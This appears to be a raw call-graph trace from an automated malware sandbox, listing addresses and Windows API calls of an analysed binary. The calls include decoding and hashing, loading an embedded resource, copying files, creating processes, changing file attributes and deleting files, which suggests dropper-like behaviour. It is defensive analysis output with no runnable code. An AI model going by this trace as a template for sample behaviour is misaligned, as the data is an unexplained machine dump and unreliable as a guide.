6c1b22c0 31 API calls 4 library calls 132500->132569 132502 6c1b63b9 132564 6c30b6f1 RaiseException 132502->132564 132503 6c1b6417 132566 6c30b6f1 RaiseException 132503->132566 132567 6c30bcce 30 API calls ___std_exception_copy 132504->132567 132513 6c1c95d7 ___CxxFrameHandler 16 API calls 132508->132513 132556 6c1b1ba0 31 API calls ___CxxFrameHandler 132509->132556 132512 6c1b645f 132568 6c30b6f1 RaiseException 132512->132568 132527 6c1b5f7a _memcpy_s 132513->132527 132514->132516 132520 6c1b6071 132514->132520 132521 6c1b6047 132514->132521 132531 6c1b5ff4 std::ios_base::_Ios_base_dtor _memcpy_s 132514->132531 132570 6c1b56fa 132516->132570 132517 6c1b616a 132524 6c1c95d7 ___CxxFrameHandler 16 API calls 132517->132524 132518 6c1b615a 132558 6c1b1ba0 31 API calls ___CxxFrameHandler 132518->132558 132526 6c1c95d7 ___CxxFrameHandler 16 API calls 132520->132526 132557 6c1b1ba0 31 API calls ___CxxFrameHandler 132521->132557 132522 6c1b64b0 132522->132472 132530 6c1b610e std::ios_base::_Ios_base_dtor _memcpy_s 132524->132530 132526->132531 132527->132499 132528 6c31ae8c ___CxxFrameHandler 29 API calls 132528->132484 132529 6c1b62b3 std::ios_base::_Ios_base_dtor 132529->132472 132530->132528 132530->132529 132531->132500 132531->132517 132531->132518 132531->132530 132532->132477 132534 6c1b55aa CryptStringToBinaryA 132533->132534 132535 6c1b55a8 132533->132535 132536 6c1b564a 132534->132536 132537 6c1b55c3 132534->132537 132535->132534 132618 6c1b56be 30 API calls ___std_exception_copy 132536->132618 132539 6c1b55eb _memcpy_s 132537->132539 132541 6c1b56a2 132537->132541 132546 6c1b55ed 132537->132546 132547 6c1b55e5 132537->132547 132540 6c1b5620 CryptStringToBinaryA 132539->132540 132543 6c1b5637 132540->132543 132544 6c1b5664 132540->132544 132551 6c1b56fa 72 API calls 132541->132551 132542 6c1b5659 132619 6c30b6f1 RaiseException 132542->132619 132543->132480 132620 6c30bcce 30 API calls ___std_exception_copy 132544->132620 132548 6c1c95d7 ___CxxFrameHandler 16 API calls 132546->132548 132617 6c1b1ba0 31 API calls ___CxxFrameHandler 132547->132617 132548->132539 132553 6c1b56b9 132551->132553 132552 6c1b5687 132621 6c30b6f1 RaiseException 132552->132621 132553->132480 132555->132485 132556->132527 132557->132531 132558->132530 132559->132491 132560->132500 132561->132496 132562->132500 132563->132502 132564->132500 132565->132503 132566->132500 132567->132512 132568->132500 132569->132516 132571 6c1b5703 132570->132571 132572 6c1b571c std::ios_base::_Ios_base_dtor 132570->132572 132571->132572 132573 6c31ae8c ___CxxFrameHandler 29 API calls 132571->132573 132572->132522 132574 6c1b573c CryptAcquireContextW 132573->132574 132575 6c1b5d4a 132574->132575 132616 6c1b57a7 std::ios_base::_Ios_base_dtor _memcpy_s 132574->132616 132634 6c30bcce 30 API calls ___std_exception_copy 132575->132634 132577 6c1b57f1 CryptCreateHash 132581 6c1b5c82 CryptReleaseContext 132577->132581 132577->132616 132578 6c1b5a30 CryptReleaseContext 132610 6c1b5a4f std::ios_base::_Ios_base_dtor 132578->132610 132579 6c1b5d72 132635 6c30b6f1 RaiseException 132579->132635 132630 6c30bcce 30 API calls ___std_exception_copy 132581->132630 132582 6c1b5bbe 132587 6c1b56fa 56 API calls 132582->132587 132584 6c1b5812 CryptHashData 132586 6c1b5cde CryptDestroyHash CryptReleaseContext 132584->132586 132584->132616 132585 6c1b5cb4 132631 6c30b6f1 RaiseException 132585->132631 132632 6c30bcce 30 API calls ___std_exception_copy 132586->132632 132590 6c1b5da2 132587->132590 132592 6c1b56fa 56 API calls 132590->132592 132591 6c1b5d19 132633 6c30b6f1 RaiseException 132591->132633 132594 6c1b5daa 132592->132594 132594->132522 132595 6c1b5881 CryptHashData 132598 6c1b589e CryptGetHashParam 132595->132598 132599 6c1b5bc6 CryptDestroyHash CryptReleaseContext 132595->132599 132596 6c1b5b51 std::ios_base::_Ios_base_dtor 132596->132522 132597 6c31ae8c ___CxxFrameHandler 29 API calls 132597->132575 132601 6c1b5c24 CryptDestroyHash CryptReleaseContext 132598->132601 132598->132616 132626 6c30bcce 30 API calls ___std_exception_copy 132599->132626 132628 6c30bcce 30 API calls ___std_exception_copy 132601->132628 132602 6c1b5c01 132627 6c30b6f1 RaiseException 132602->132627 132604 6c1b59e1 CryptGetHashParam CryptDestroyHash 132608 6c1b5b74 CryptReleaseContext 132604->132608 132604->132616 132606 6c1b5c5f 132629 6c30b6f1 RaiseException 132606->132629 132624 6c30bcce 30 API calls ___std_exception_copy 132608->132624 132610->132596 132610->132597 132612 6c1b5ba3 132625 6c30b6f1 RaiseException 132612->132625 132615 6c1c95d7 ___CxxFrameHandler 16 API calls 132615->132616 132616->132577 132616->132578 132616->132584 132616->132595 132616->132604 132616->132610 132616->132615 132622 6c1b1ba0 31 API calls ___CxxFrameHandler 132616->132622 132623 6c1b68a0 56 API calls 3 library calls 132616->132623 132617->132539 132618->132542 132619->132544 132620->132552 132621->132541 132622->132616 132623->132616 132624->132612 132625->132582 132626->132602 132627->132582 132628->132606 132629->132582 132630->132585 132631->132582 132632->132591 132633->132582 132634->132579 132635->132582 132636 6c1b6cf9 132637 6c1b6d01 132636->132637 132638 6c1ba106 129 API calls 132637->132638 132639 6c1b6e89 std::ios_base::_Ios_base_dtor 132638->132639 132640 6c1b8810 132639->132640 132658 6c1b76ef _memcpy_s _strlen 132639->132658 132843 6c1b1900 39 API calls _strlen 132639->132843 132642 6c31ae8c ___CxxFrameHandler 29 API calls 132640->132642 132644 6c1b8815 132642->132644 132643 6c1b6f02 132844 6c1b1900 39 API calls _strlen 132643->132844 132898 6c1b22c0 31 API calls 4 library calls 132644->132898 132645 6c1b881a 132899 6c1b22c0 31 API calls 4 library calls 132645->132899 132649 6c1b6f16 132845 6c1b1900 39 API calls _strlen 132649->132845 132650 6c1b8829 132900 6c1b22c0 31 API calls 4 library calls 132650->132900 132652 6c1b6f2a 132846 6c1ba75c 39 API calls 132652->132846 132654 6c1b8838 132901 6c1b22c0 31 API calls 4 library calls 132654->132901 132657 6c1b887e 132907 6c1b22c0 31 API calls 4 library calls 132657->132907 132658->132645 132658->132657 132661 6c1b785f 132658->132661 132673 6c1b8795 132658->132673 132702 6c1b786f std::ios_base::_Ios_base_dtor _memcpy_s _strlen 132658->132702 132659 6c1b6f43 132847 6c1b1900 39 API calls _strlen 132659->132847 132660 6c1b8847 132902 6c1b22c0 31 API calls 4 library calls 132660->132902 132876 6c1b1ba0 31 API calls ___CxxFrameHandler 132661->132876 132665 6c1b6f51 132848 6c1b1900 39 API calls _strlen 132665->132848 132667 6c1b888d 132908 6c1b22c0 31 API calls 4 library calls 132667->132908 132668 6c1b8856 132903 6c1b22c0 31 API calls 4 library calls 132668->132903 132672 6c1b885b 132904 6c1b22c0 31 API calls 4 library calls 132672->132904 132677 6c1c95d7 ___CxxFrameHandler 16 API calls 132673->132677 132674 6c1b6f65 132849 6c1ba75c 39 API calls 132674->132849 132675 6c1b889c 132909 6c1b22c0 31 API calls 4 library calls 132675->132909 132677->132702 132679 6c1b8860 132905 6c1b22c0 31 API calls 4 library calls 132679->132905 132681 6c1b88ab 132910 6c1b22c0 31 API calls 4 library calls 132681->132910 132683 6c1b6f80 132850 6c1b1900 39 API calls _strlen 132683->132850 132685 6c1b886f 132906 6c1b22c0 31 API calls 4 library calls 132685->132906 132687 6c1b88ba 132911 6c1b22c0 31 API calls 4 library calls 132687->132911 132690 6c1b6f8e 132851 6c1b1900 39 API calls _strlen 132690->132851 132691 6c1b88c9 132912 6c1b22c0 31 API calls 4 library calls 132691->132912 132694 6c1b88d8 132913 6c1b22c0 31 API calls 4 library calls 132694->132913 132696 6c1b6fa2 _strlen 132696->132668 132700 6c1b702e 132696->132700 132701 6c1b7023 132696->132701 132709 6c1b6fd5 _memcpy_s 132696->132709 132697 6c1b88e7 132914 6c1b2572 31 API calls 3 library calls 132697->132914 132699 6c1b8902 132704 6c1c95d7 ___CxxFrameHandler 16 API calls 132700->132704 132852 6c1b1ba0 31 API calls ___CxxFrameHandler 132701->132852 132702->132640 132702->132650 132705 6c1b7a78 132702->132705 132706 6c1b7a83 132702->132706 132714 6c1b7a2a _memcpy_s 132702->132714 132704->132709 132877 6c1b1ba0 31 API calls ___CxxFrameHandler 132705->132877 132707 6c1c95d7 ___CxxFrameHandler 16 API calls 132706->132707 132707->132714 132709->132687 132710 6c1b70e2 132709->132710 132712 6c1b87c5 132709->132712 132719 6c1b70f2 std::ios_base::_Ios_base_dtor _memcpy_s 132709->132719 132853 6c1b1ba0 31 API calls ___CxxFrameHandler 132710->132853 132716 6c1c95d7 ___CxxFrameHandler 16 API calls 132712->132716 132713 6c1b7b2f 132878 6c1b1ba0 31 API calls ___CxxFrameHandler 132713->132878 132714->132667 132714->132713 132718 6c1b87a3 132714->132718 132726 6c1b7b3f std::ios_base::_Ios_base_dtor _memcpy_s 132714->132726 132716->132719 132721 6c1c95d7 ___CxxFrameHandler 16 API calls 132718->132721 132719->132640 132854 6c1ba75c 39 API calls 132719->132854 132720 6c1b7c78 CopyFileA 132724 6c1b7c86 132720->132724 132730 6c1b7cc1 _strlen 132720->132730 132721->132726 132723 6c1b7255 std::ios_base::_Ios_base_dtor 132723->132640 132855 6c1b1900 39 API calls _strlen 132723->132855 132879 6c1b1900 39 API calls _strlen 132724->132879 132725 6c1b72b1 132856 6c1ba75c 39 API calls 132725->132856 132726->132640 132726->132720 132728 6c1b7c9f 132880 6c1ba75c 39 API calls 132728->132880 132730->132654 132735 6c1b7d4d 132730->132735 132736 6c1b7d42 132730->132736 132742 6c1b7cf4 _memcpy_s 132730->132742 132731 6c1b72cc 132857 6c1b1900 39 API calls _strlen 132731->132857 132734 6c1b72da 132858 6c1b1900 39 API calls _strlen 132734->132858 132740 6c1c95d7 ___CxxFrameHandler 16 API calls 132735->132740 132882 6c1b1ba0 31 API calls ___CxxFrameHandler 132736->132882 132737 6c1b7cb8 132881 6c1b8b87 76 API calls 132737->132881 132740->132742 132742->132675 132743 6c1b7dd1 132742->132743 132748 6c1b8725 132742->132748 132753 6c1b7de4 std::ios_base::_Ios_base_dtor _memcpy_s 132742->132753 132883 6c1b1ba0 31 API calls ___CxxFrameHandler 132743->132883 132744 6c1b72ee _strlen 132744->132672 132746 6c1b7370 132744->132746 132747 6c1b7365 132744->132747 132751 6c1b7321 _memcpy_s 132744->132751 132750 6c1c95d7 ___CxxFrameHandler 16 API calls 132746->132750 132859 6c1b1ba0 31 API calls ___CxxFrameHandler 132747->132859 132754 6c1c95d7 ___CxxFrameHandler 16 API calls 132748->132754 132750->132751 132751->132691 132758 6c1b7410 132751->132758 132765 6c1b87dd 132751->132765 132771 6c1b7420 std::ios_base::_Ios_base_dtor _memcpy_s 132751->132771 132752 6c1b7f39 CopyFileA 132755 6c1b7f47 132752->132755 132760 6c1b7f82 _strlen 132752->132760 132753->132640 132753->132752 132754->132753 132884 6c1b1900 39 API calls _strlen 132755->132884 132757 6c1b7f60 132885 6c1ba75c 39 API calls 132757->132885 132860 6c1b1ba0 31 API calls ___CxxFrameHandler 132758->132860 132760->132660 132762 6c1b804c 132760->132762 132763 6c1b8041 132760->132763 132773 6c1b7fe9 _memcpy_s 132760->132773 132768 6c1c95d7 ___CxxFrameHandler 16 API calls 132762->132768 132887 6c1b1ba0 31 API calls ___CxxFrameHandler 132763->132887 132764 6c1b7f79 132886 6c1b8b87 76 API calls 132764->132886 132770 6c1c95d7 ___CxxFrameHandler 16 API calls 132765->132770 132768->132773 132770->132771 132771->132640 132861 6c1ba75c 39 API calls 132771->132861 132773->132681 132774 6c1b80cc 132773->132774 132781 6c1b874e 132773->132781 132787 6c1b80dc std::ios_base::_Ios_base_dtor _memcpy_s 132773->132787 132888 6c1b1ba0 31 API calls ___CxxFrameHandler 132774->132888 132775 6c1b7581 std::ios_base::_Ios_base_dtor 132775->132640 132862 6c1b1900 39 API calls _strlen 132775->132862 132776 6c1b75dd 132863 6c1b1900 39 API calls _strlen 132776->132863 132779 6c1b75f1 132864 6c1b1900 39 API calls _strlen 132779->132864 132783 6c1c95d7 ___CxxFrameHandler 16 API calls 132781->132783 132782 6c1b7605 132865 6c1b1900 39 API calls _strlen 132782->132865 132783->132787 132784 6c1baab6 129 API calls 132790 6c1b8253 std::ios_base::_Ios_base_dtor 132784->132790 132786 6c1b7619 132866 6c1b1900 39 API calls _strlen 132786->132866 132787->132640 132787->132784 132789 6c1b82d7 CreateProcessA 132793 6c1b8663 132789->132793 132799 6c1b831b _strlen 132789->132799 132790->132640 132790->132789 132889 6c1bad72 76 API calls 132790->132889 132791 6c1b762d 132867 6c1b1900 39 API calls _strlen 132791->132867 132896 6c1b8e22 72 API calls std::ios_base::_Ios_base_dtor 132793->132896 132796 6c1b82b7 132890 6c1b8bb0 81 API calls 132796->132890 132797 6c1b7641 132868 6c1b1900 39 API calls _strlen 132797->132868 132799->132679 132806 6c1b839f 132799->132806 132807 6c1b8394 132799->132807 132820 6c1b8346 _memcpy_s 132799->132820 132801 6c1b82bf 132801->132789 132803 6c1b82c6 132801->132803 132802 6c1b7655 132869 6c1b1900 39 API calls _strlen 132802->132869 132891 6c1b6b9c OpenProcess CloseHandle 132803->132891 132805 6c1b866b std::ios_base::_Ios_base_dtor 132805->132640 132813 6c1b86dd std::ios_base::_Ios_base_dtor 132805->132813 132812 6c1c95d7 ___CxxFrameHandler 16 API calls 132806->132812 132892 6c1b1ba0 31 API calls ___CxxFrameHandler 132807->132892 132810 6c1b86f9 132812->132820 132897 6c1b8d9e 72 API calls std::ios_base::_Ios_base_dtor 132813->132897 132814 6c1b7669 132870 6c1b1900 39 API calls _strlen 132814->132870 132815 6c1b82cc 132815->132789 132815->132793 132817 6c1b767d 132871 6c1b1900 39 API calls _strlen 132817->132871 132819 6c1b7691 132872 6c1b1900 39 API calls _strlen 132819->132872 132820->132694 132821 6c1b8414 132820->132821 132826 6c1b8802 132820->132826 132832 6c1b8420 std::ios_base::_Ios_base_dtor _memcpy_s 132820->132832 132893 6c1b1ba0 31 API calls ___CxxFrameHandler 132821->132893 132823 6c1b76a5 132873 6c1b1900 39 API calls _strlen 132823->132873 132828 6c1c95d7 ___CxxFrameHandler 16 API calls 132826->132828 132827 6c1ba106 129 API calls 132830 6c1b85d3 132827->132830 132828->132832 132829 6c1b76b9 132874 6c1b1900 39 API calls _strlen 132829->132874 132830->132640 132835 6c1b85fa std::ios_base::_Ios_base_dtor 132830->132835 132836 6c1b8642 CloseHandle CloseHandle 132830->132836 132832->132640 132832->132827 132833 6c1b76cd 132875 6c1b1900 39 API calls _strlen 132833->132875 132835->132830 132894 6c1b8bea 76 API calls 132835->132894 132895 6c1b8d9e 72 API calls std::ios_base::_Ios_base_dtor 132836->132895 132837 6c1b76e1 132840 6c1b8b0c 81 API calls 132837->132840 132840->132658 132841 6c1b8637 132842 6c1b8b0c 81 API calls 132841->132842 132842->132836 132843->132643 132844->132649 132845->132652 132846->132659 132847->132665 132848->132674 132849->132683 132850->132690 132851->132696 132852->132709 132853->132719 132854->132723 132855->132725 132856->132731 132857->132734 132858->132744 132859->132751 132860->132771 132861->132775 132862->132776 132863->132779 132864->132782 132865->132786 132866->132791 132867->132797 132868->132802 132869->132814 132870->132817 132871->132819 132872->132823 132873->132829 132874->132833 132875->132837 132876->132702 132877->132714 132878->132726 132879->132728 132880->132737 132881->132730 132882->132742 132883->132753 132884->132757 132885->132764 132886->132760 132887->132773 132888->132787 132889->132796 132890->132801 132891->132815 132892->132820 132893->132832 132894->132841 132895->132793 132896->132805 132897->132810 132898->132645 132899->132650 132900->132654 132901->132660 132902->132668 132903->132672 132904->132679 132905->132685 132906->132657 132907->132667 132908->132675 132909->132681 132910->132687 132911->132691 132912->132694 132913->132697 132914->132699 132915 6c1c503f GetModuleHandleA FindResourceW 132916 6c1c509a LoadResource SizeofResource LockResource 132915->132916 132919 6c1c50e0 Mailbox 132915->132919 132917 6c1c50bb Mailbox _memcpy_s 132916->132917 132916->132919 132920 6c1c40a8 132917->132920 132922 6c1c4136 _strlen 132920->132922 132921 6c1c4612 132961 6c1b22c0 31 API calls 4 library calls 132921->132961 132922->132921 132924 6c1c419b 132922->132924 132925 6c1c4186 132922->132925 132931 6c1c4148 _memcpy_s 132922->132931 132929 6c1c95d7 ___CxxFrameHandler 16 API calls 132924->132929 132953 6c1b1ba0 31 API calls ___CxxFrameHandler 132925->132953 132926 6c1c4621 132962 6c1b2572 31 API calls 3 library calls 132926->132962 132929->132931 132930 6c1c4639 132930->132919 132932 6c1b5dcb 86 API calls 132931->132932 132934 6c1c41ed std::ios_base::_Ios_base_dtor 132932->132934 132940 6c1c45b1 132934->132940 132954 6c1c469e 78 API calls 132934->132954 132935 6c31ae8c ___CxxFrameHandler 29 API calls 132935->132921 132936 6c1ba5f0 68 API calls 132950 6c1c4294 std::ios_base::_Ios_base_dtor _memcpy_s _strlen 132936->132950 132939 6c1c4575 std::ios_base::_Ios_base_dtor 132939->132940 132956 6c1c47a6 29 API calls std::ios_base::_Ios_base_dtor 132939->132956 132940->132935 132941 6c1c45d4 std::ios_base::_Ios_base_dtor 132940->132941 132941->132919 132942 6c1c45f9 132957 6c1b4b62 31 API calls 132942->132957 132944 6c1c45fe 132958 6c1b22c0 31 API calls 4 library calls 132944->132958 132946 6c1c4603 132959 6c1b22c0 31 API calls 4 library calls 132946->132959 132948 6c1c4608 132960 6c1b4b62 31 API calls 132948->132960 132950->132936 132950->132939 132950->132940 132950->132942 132950->132944 132950->132946 132950->132948 132951 6c1b1ba0 31 API calls ___CxxFrameHandler 132950->132951 132952 6c1c95d7 16 API calls ___CxxFrameHandler 132950->132952 132955 6c1c75d7 76 API calls 132950->132955 132951->132950 132952->132950 132953->132931 132954->132950 132955->132950 132956->132940 132958->132946 132959->132948 132961->132926 132962->132930 132963 6c1c8bff 132968 6c1e7421 132963->132968 132965 6c1c8c09 132966 6c1c9700 32 API calls 132965->132966 132967 6c1c8c13 132966->132967 132969 6c1e742d __EH_prolog3 132968->132969 132972 6c1e777d 132969->132972 132971 6c1e7616 Concurrency::details::ExternalContextBase::~ExternalContextBase 132971->132965 132973 6c1e779e _memcpy_s 132972->132973 132982 6c1e7825 132972->132982 132975 6c1e77ce VerSetConditionMask VerSetConditionMask VerifyVersionInfoW GetSystemMetrics 132973->132975 132983 6c1e783a 132975->132983 132976 6c1e7838 132976->132971 133146 6c1e89cd 5 API calls ___raise_securityfailure 132982->133146 133147 6c1e89db 132983->133147 132985 6c1e7846 GetSysColor 132986 6c1e7867 GetSysColor 132985->132986 132987 6c1e785b GetSysColor 132985->132987 132989 6c1e787e GetSysColor 132986->132989 132990 6c1e788a 132986->132990 132987->132986 132989->132990 133148 6c1cd1dc 132990->133148 132992 6c1e78a0 22 API calls 132993 6c1e79ca 132992->132993 132994 6c1e79d3 GetSysColor 132992->132994 132995 6c1e79e5 GetSysColorBrush 132993->132995 132994->132995 132996 6c1e7c52 132995->132996 132997 6c1e7a01 GetSysColorBrush 132995->132997 133186 6c1e0b00 RaiseException CallUnexpected 132996->133186 132997->132996 132998 6c1e7a14 GetSysColorBrush 132997->132998 132998->132996 133000 6c1e7a27 132998->133000 133156 6c1cc4fe 133000->133156 133003 6c1e7a34 CreateSolidBrush 133161 6c1cc4a8 133003->133161 133005 6c1e7a45 133006 6c1cc4fe 17 API calls 133005->133006 133007 6c1e7a52 CreateSolidBrush 133006->133007 133008 6c1cc4a8 16 API calls 133007->133008 133009 6c1e7a63 133008->133009 133010 6c1cc4fe 17 API calls 133009->133010 133011 6c1e7a70 CreateSolidBrush 133010->133011 133012 6c1cc4a8 16 API calls 133011->133012 133013 6c1e7a81 133012->133013 133014 6c1cc4fe 17 API calls 133013->133014 133015 6c1e7a8e CreateSolidBrush 133014->133015 133016 6c1cc4a8 16 API calls 133015->133016 133017 6c1e7aa2 133016->133017 133018 6c1cc4fe 17 API calls 133017->133018 133019 6c1e7aaf CreateSolidBrush 133018->133019 133020 6c1cc4a8 16 API calls 133019->133020 133021 6c1e7ac0 133020->133021 133022 6c1cc4fe 17 API calls 133021->133022 133023 6c1e7acd CreateSolidBrush 133022->133023 133024 6c1cc4a8 16 API calls 133023->133024 133025 6c1e7ade 133024->133025 133026 6c1cc4fe 17 API calls 133025->133026 133027 6c1e7aeb CreateSolidBrush 133026->133027 133028 6c1cc4a8 16 API calls 133027->133028 133029 6c1e7afc 133028->133029 133030 6c1cc4fe 17 API calls 133029->133030 133031 6c1e7b09 CreatePen 133030->133031 133032 6c1cc4a8 16 API calls 133031->133032 133033 6c1e7b22 133032->133033 133034 6c1cc4fe 17 API calls 133033->133034 133035 6c1e7b2f CreatePen 133034->133035 133036 6c1cc4a8 16 API calls 133035->133036 133037 6c1e7b46 133036->133037 133038 6c1cc4fe 17 API calls 133037->133038 133039 6c1e7b53 CreatePen 133038->133039 133040 6c1cc4a8 16 API calls 133039->133040 133041 6c1e7b6a 133040->133041 133042 6c1e7b81 133041->133042 133047 6c1cc4fe 17 API calls 133041->133047 133043 6c1e7bee 133042->133043 133044 6c1e7b8a CreateSolidBrush 133042->133044 133182 6c1e8808 7 API calls 2 library calls 133043->133182 133045 6c1cc4a8 16 API calls 133044->133045 133048 6c1e7bec 133045->133048 133047->133042 133165 6c21b409 133048->133165 133049 6c1e7bf8 133049->132996 133050 6c1e7bfc 133049->133050 133146->132976 133147->132985 133149 6c1cd1e8 __EH_prolog3 133148->133149 133150 6c1cd20b GetWindowDC 133149->133150 133187 6c1cc68a 133150->133187 133152 6c1cd21d 133155 6c1cd221 Concurrency::details::ExternalContextBase::~ExternalContextBase 133152->133155 133191 6c1cbe2f RaiseException CallUnexpected 133152->133191 133155->132992 133157 6c1cc504 133156->133157 133158 6c1cc507 133156->133158 133157->133003 133206 6c1cc4d4 133158->133206 133160 6c1cc50c DeleteObject 133160->133003 133162 6c1cc4b5 133161->133162 133164 6c1cc4bf 133161->133164 133211 6c1cd3a4 16 API calls 3 library calls 133162->133211 133164->133005 133182->133049 133188 6c1cc697 133187->133188 133190 6c1cc6a2 133187->133190 133192 6c1cd333 133188->133192 133190->133152 133193 6c1cd33f __EH_prolog3 133192->133193 133200 6c1e0247 133193->133200 133195 6c1cd344 Concurrency::details::ExternalContextBase::~ExternalContextBase 133196 6c1c95d7 ___CxxFrameHandler 16 API calls 133195->133196 133199 6c1cd38a Concurrency::details::ExternalContextBase::~ExternalContextBase 133195->133199 133197 6c1cd365 133196->133197 133197->133199 133204 6c1ea349 RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase __EH_prolog3 133197->133204 133199->133190 133201 6c1e024c 133200->133201 133201->133195 133205 6c30b6f1 RaiseException 133201->133205 133203 6c1e0b19 133204->133199 133205->133203 133207 6c1cc4df 133206->133207 133208 6c1cc4e6 133206->133208 133210 6c1cd3a4 16 API calls 3 library calls 133207->133210 133208->133160 133210->133208 133211->133164 133266 6c1d07f9 133267 6c1d0814 133266->133267 133268 6c1d0807 133266->133268 133269 6c1c7efc 16 API calls 133267->133269 133268->133267 133271 6c1d081b 133268->133271 133270 6c1d0866 133269->133270 133292 6c1c88b0 133270->133292 133271->133270 133276 6c1d0835 133271->133276 133274 6c1c88b0 133287 6c1c7efc 133274->133287 133275 6c1d0880 133299 6c1c9b51 16 API calls 133276->133299 133280 6c1d0842 133300 6c1ca1c4 29 API calls _memcpy_s 133280->133300 133284 6c1d0851 133288 6c1c7f0c 133287->133288 133289 6c1c7f07 133287->133289 133302 6c1e0c8f 16 API calls 2 library calls 133288->133302 133301 6c1e0acc RaiseException CallUnexpected 133289->133301 133293 6c1c7efc 16 API calls 133292->133293 133294 6c1c88ba 133293->133294 133303 6c1c7c9a 133294->133303 133297 6c1c9700 32 API calls 133298 6c1c88ce SysAllocStringLen 133297->133298 133298->133274 133298->133275 133299->133280 133300->133284 133308 6c1d2829 133303->133308 133305 6c1c7cd4 133321 6c1e3a37 GetModuleHandleW 133305->133321 133309 6c1d2838 __EH_prolog3_GS 133308->133309 133324 6c1e1666 133309->133324 133311 6c1d284e 133313 6c1d2863 133311->133313 133328 6c31bea7 30 API calls 3 library calls 133311->133328 133314 6c1d2983 133313->133314 133316 6c1d288f GetCurrentThread GetCurrentThreadId GetVersionExW 133313->133316 133329 6c1e0b00 RaiseException CallUnexpected 133314->133329 133317 6c1d2946 133316->133317 133319 6c1e8ac7 5 API calls 133317->133319 133320 6c1d2980 133319->133320 133320->133305 133322 6c1e3a4c GetProcAddress 133321->133322 133323 6c1c7ce7 133321->133323 133322->133323 133323->133297 133325 6c1e1672 __EH_prolog3 133324->133325 133330 6c1e1a67 GetCursorPos RaiseException 133325->133330 133327 6c1e1694 Concurrency::details::ExternalContextBase::~ExternalContextBase 133327->133311 133328->133313 133330->133327 133331 6c31bad7 133332 6c31bae4 133331->133332 133333 6c31baff 133331->133333 133332->133333 133334 6c31baf0 133332->133334 133336 6c31bb0e 133333->133336 133353 6c31ba99 30 API calls _memcpy_s 133333->133353 133352 6c30ea09 14 API calls _memcpy_s 133334->133352 133340 6c329632 133336->133340 133339 6c31baf5 _memcpy_s 133341 6c32964a 133340->133341 133342 6c32963f 133340->133342 133344 6c329652 133341->133344 133350 6c32965b _unexpected 133341->133350 133354 6c3223f1 15 API calls 3 library calls 133342->133354 133355 6c3223b7 14 API calls 2 library calls 133344->133355 133345 6c329660 133356 6c30ea09 14 API calls _memcpy_s 133345->133356 133346 6c329685 RtlReAllocateHeap 133349 6c329647 133346->133349 133346->133350 133349->133339 133350->133345 133350->133346 133357 6c318beb EnterCriticalSection LeaveCriticalSection ___CxxFrameHandler 133350->133357 133352->133339 133353->133336 133354->133349 133355->133349 133356->133349 133357->133350 133358 1001f927 133359 1001fb9a 133358->133359 133363 100060df 71 API calls 133359->133363 133364 10005ef8 133359->133364 133368 1001f997 133359->133368 133360 1001fb9c 133363->133360 133365 10005f68 133364->133365 133366 10001100 70 API calls 133365->133366 133367 1001f2fd 133365->133367 133366->133367 133370 10005f68 133368->133370 133369 1001f2fd 133370->133369 133371 10001100 70 API calls 133370->133371 133371->133369 133372 6c1bf17c 133373 6c1bf1c4 133372->133373 133374 6c1ba106 129 API calls 133373->133374 133375 6c1bf1d6 133374->133375 133376 6c1bf21d 133375->133376 133384 6c1bf254 133375->133384 133391 6c1b8d9e 72 API calls std::ios_base::_Ios_base_dtor 133376->133391 133378 6c1bf224 133381 6c1b8b0c 81 API calls 133382 6c1bf209 SetFileAttributesA 133381->133382 133382->133376 133392 6c1b1cb4 133384->133392 133387 6c1b1f46 39 API calls 133388 6c1bf308 133387->133388 133396 6c1b1da6 133388->133396 133391->133378 133393 6c1b1cf4 133392->133393 133395 6c1b1d05 133393->133395 133400 6c1b1dc2 39 API calls 133393->133400 133395->133387 133398 6c1b1dae 133396->133398 133397 6c1b1db9 133397->133381 133398->133397 133401 6c1b28da 39 API calls 133398->133401 133400->133395 133401->133397 133402 6c31f21b 133403 6c31f233 133402->133403 133404 6c31f229 133402->133404 133406 6c31f285 __wsopen_s 39 API calls 133403->133406 133405 6c32c139 16 API calls 133404->133405 133407 6c31f230 133405->133407 133408 6c31f24d 133406->133408 133409 6c30dff2 __wsopen_s 17 API calls 133408->133409 133410 6c31f25a 133409->133410 133413 6c31f261 133410->133413 133415 6c32c139 DeleteFileW 133410->133415 133412 6c31f27f 133413->133412 133420 6c3223b7 14 API calls 2 library calls 133413->133420 133416 6c32c14b GetLastError 133415->133416 133417 6c32c15d 133415->133417 133421 6c30ea2f 14 API calls 2 library calls 133416->133421 133417->133413 133419 6c32c157 133419->133413 133420->133412 133421->133419 133422 10005eb2 Sleep 133423 10006f17 77 API calls 133422->133423 133424 10005ec9 133423->133424 133425 6c1b9628 133426 6c1b9643 _memcpy_s 133425->133426 133428 6c1b9649 _memcpy_s 133425->133428 133427 6c1b96e5 133426->133427 133426->133428 133429 6c31e2ef __fread_nolock 45 API calls 133426->133429 133427->133428 133431 6c31e2ef 133427->133431 133429->133426 133434 6c31e252 133431->133434 133435 6c31e25e ___scrt_is_nonwritable_in_current_image 133434->133435 133436 6c31e2a8 133435->133436 133437 6c31e271 _memcpy_s 133435->133437 133446 6c31e296 133435->133446 133447 6c30e8cd EnterCriticalSection 133436->133447 133462 6c30ea09 14 API calls _memcpy_s 133437->133462 133440 6c31e2b2 133448 6c31e30c 133440->133448 133441 6c31e28b 133463 6c31ae7c 29 API calls _memcpy_s 133441->133463 133446->133428 133447->133440 133450 6c31e31e _memcpy_s 133448->133450 133455 6c31e2c9 133448->133455 133449 6c31e32b 133486 6c30ea09 14 API calls _memcpy_s 133449->133486 133450->133449 133450->133455 133458 6c31e37c 133450->133458 133452 6c31e330 133487 6c31ae7c 29 API calls _memcpy_s 133452->133487 133464 6c31e2e7 LeaveCriticalSection __fread_nolock 133455->133464 133456 6c31e4a7 _memcpy_s 133554 6c30ea09 14 API calls _memcpy_s 133456->133554 133458->133455 133458->133456 133459 6c31a18d __fread_nolock 29 API calls 133458->133459 133465 6c32b309 133458->133465 133488 6c3131c6 29 API calls _memcpy_s 133458->133488 133489 6c32b8d2 133458->133489 133459->133458 133462->133441 133463->133446 133464->133446 133466 6c32b314 133465->133466 133467 6c32b321 133466->133467 133470 6c32b339 133466->133470 133585 6c30ea09 14 API calls _memcpy_s 133467->133585 133469 6c32b326 133586 6c31ae7c 29 API calls _memcpy_s 133469->133586 133472 6c32b398 133470->133472 133480 6c32b331 133470->133480 133587 6c32cd01 14 API calls 2 library calls 133470->133587 133474 6c31a18d __fread_nolock 29 API calls 133472->133474 133475 6c32b3b1 133474->133475 133555 6c32b7b9 133475->133555 133478 6c31a18d __fread_nolock 29 API calls 133479 6c32b3ea 133478->133479 